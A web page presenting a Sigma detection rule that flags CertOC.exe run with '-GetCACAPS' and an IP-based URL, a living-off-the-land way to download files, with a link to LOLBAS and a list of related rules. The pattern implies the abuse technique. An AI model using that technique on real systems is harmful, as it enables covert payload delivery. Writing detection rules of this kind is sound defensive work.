File Download From IP Based URL Via CertOC.EXE
Detects when a user downloads a file from an IP based URL using CertOC.exe
Sigma rule (View on GitHub)
1title: File Download From IP Based URL Via CertOC.EXE
2id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
3related:
4 - id: 70ad0861-d1fe-491c-a45f-fa48148a300d
5 type: similar
6status: test
7description: Detects when a user downloads a file from an IP based URL using CertOC.exe
8references:
9 - https://lolbas-project.github.io/lolbas/Binaries/Certoc/
10author: Nasreddine Bencherchali (Nextron Systems)
11date: 2023-10-18
12tags:
13 - attack.command-and-control
14 - attack.execution
15 - attack.t1105
16logsource:
17 category: process_creation
18 product: windows
19detection:
20 selection_img:
21 - Image|endswith: '\certoc.exe'
22 - OriginalFileName: 'CertOC.exe'
23 selection_ip:
24 CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
25 selection_cli:
26 CommandLine|contains: '-GetCACAPS'
27 condition: all of selection*
28falsepositives:
29 - Unknown
30level: high
References
-
CertOC.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
Read More
Related rules
- DarkGate - Autoit3.EXE File Creation By Uncommon Process
- Command Line Execution with Suspicious URL and AppData Strings
- Greenbug Espionage Group Indicators
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Potential In-Memory Download And Compile Of Payloads